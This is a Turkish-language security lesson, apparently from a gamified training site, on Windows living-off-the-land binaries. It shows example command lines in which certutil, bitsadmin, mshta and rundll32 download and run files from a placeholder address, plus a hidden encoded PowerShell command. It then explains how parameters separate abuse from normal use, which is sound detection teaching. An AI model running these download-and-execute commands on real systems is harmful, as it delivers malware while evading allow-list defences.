Puan ders bitince hesaba yazılır. Bu dersi tamamlayınca +60 XP alacaksın. Giriş yapmadan ilerlersen puan yalnız bu tarayıcıda durur.
Yaşayan ikililer (LOLBins)
Yaşayan ikili, sistemle birlikte gelen meşru bir programdır. İngilizce kısaltması LOLBin olarak geçer. Saldırgan bunları kullanır çünkü dosya indirmesi gerekmez, imza denetimi takılmaz ve çoğu kural bu adları beyaz listede tutar.
Örnekler tanıdıktır. certutil sertifika aracıdır ama dosya indirir. bitsadmin arka plan aktarım aracıdır, o da indirir. rundll32 kütüphane çağırır, mshta ise HTML uygulaması çalıştırır. Hepsi Windows'la gelir.
certutil.exe -urlcache -split -f http://203.0.113.19/a.exe C:\Users\Public\a.exe bitsadmin /transfer j /download http://203.0.113.19/b.dll C:\Users\Public\b.dll rundll32.exe C:\Users\Public\b.dll,Start mshta.exe http://203.0.113.19/x.hta powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA
Zararlı kullanım isimden değil parametreden anlaşılır. certutil normalde sertifika doğrular ya da karma hesaplar; -urlcache ve -split parametreleriyle çalıştığında internetten dosya indirir, bu ikinci kullanım şüphelidir. powershell.exe -File ile yerel bir betik açmak sıradandır, ama -enc ile kodlanmış komut çalıştırmak nadiren meşrudur. mshta.exe'nin yerel bir dosyayı açması farklıdır, uzak bir adresten .hta çekmesi farklıdır; ikincisi neredeyse her zaman kötüye kullanımdır. rundll32.exe de aynı şekilde çalışır: bilinen bir sistem kütüphanesinden denetim masası ögesi açması normaldir, bilinmeyen bir yoldaki kütüphaneyi çağırması değildir. Aynı programın iki satırını yan yana koyup parametreyi karşılaştırmak en hızlı ayırt etme yoludur.